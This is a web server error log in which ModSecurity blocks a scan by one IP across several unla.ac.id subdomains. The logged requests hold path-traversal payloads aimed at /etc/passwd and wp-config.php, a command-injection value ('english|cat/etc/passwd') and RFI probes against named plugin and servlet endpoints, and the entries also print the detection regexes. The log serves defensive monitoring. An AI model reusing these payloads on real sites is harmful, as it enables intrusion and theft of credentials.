[Tue Aug 29 11:43:07.359422 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAARpg48AAAAU"]
[Tue Aug 29 11:43:07.363464 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAdb7nwAAAAb"]
[Tue Aug 29 11:43:07.389511 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAdftVoAAAAG"]
[Tue Aug 29 11:43:07.573247 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAevkQoAAAAA"]
[Tue Aug 29 11:43:07.809718 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAeX1EkAAAAK"]
[Tue Aug 29 11:43:08.052024 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13XMCo-f0AAAevkQsAAAAA"]
[Tue Aug 29 11:43:08.067222 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdOeUcAAAAS"]
[Tue Aug 29 11:43:08.533603 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdSZQEAAAAX"]
[Tue Aug 29 11:43:08.534966 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAeYb0YAAAAB"]
[Tue Aug 29 11:43:08.537015 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAeX1EwAAAAK"]
[Tue Aug 29 11:43:08.537046 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdftV4AAAAG"]
[Tue Aug 29 11:43:08.565542 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAeYb0cAAAAB"]
[Tue Aug 29 11:43:08.565695 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAActbN0AAAAH"]
[Tue Aug 29 11:43:08.569115 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAevkQ4AAAAA"]
[Tue Aug 29 11:43:08.593489 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAdSZQMAAAAX"]
[Tue Aug 29 11:43:08.639838 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAexH-AAAAAN"]
[Tue Aug 29 11:43:08.643173 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAActbOAAAAAH"]
[Tue Aug 29 11:43:09.374348 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAcsLJUAAAAE"]
[Tue Aug 29 11:43:09.377892 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13XcCo-f0AAActbOIAAAAH"]
[Tue Aug 29 11:43:09.392396 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAexH-IAAAAN"]
[Tue Aug 29 11:43:09.395302 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAeYb0wAAAAB"]
[Tue Aug 29 11:43:09.395581 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAcoNnwAAAAF"]
[Tue Aug 29 11:43:09.410522 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAeChbAAAAAw"]
[Tue Aug 29 11:43:09.416655 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAewCUwAAAAI"]
[Tue Aug 29 11:43:10.387798 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAcoNn0AAAAF"]
[Tue Aug 29 11:43:10.391016 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XsCo-f0AAAcsLJYAAAAE"]
[Tue Aug 29 11:43:10.405273 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAQSW4kAAAA0"]
[Tue Aug 29 11:43:10.407899 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAdb7n8AAAAb"]
[Tue Aug 29 11:43:10.418635 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAewCU4AAAAI"]
[Tue Aug 29 11:43:10.493745 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAcsLJgAAAAE"]
[Tue Aug 29 11:43:11.408348 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAevkRsAAAAA"]
[Tue Aug 29 11:43:11.464213 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAewCVYAAAAI"]
[Tue Aug 29 11:43:11.484864 2023] [:error] [pid 1970] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAey2m0AAAAO"]
[Tue Aug 29 11:43:11.489699 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13X8Co-f0AAAQSW5MAAAA0"]
[Tue Aug 29 11:43:11.493026 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAActbOwAAAAH"]
[Tue Aug 29 11:43:11.509414 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAdSZREAAAAX"]
[Tue Aug 29 11:43:12.425877 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13YMCo-f0AAAdQ3lQAAAAV"]
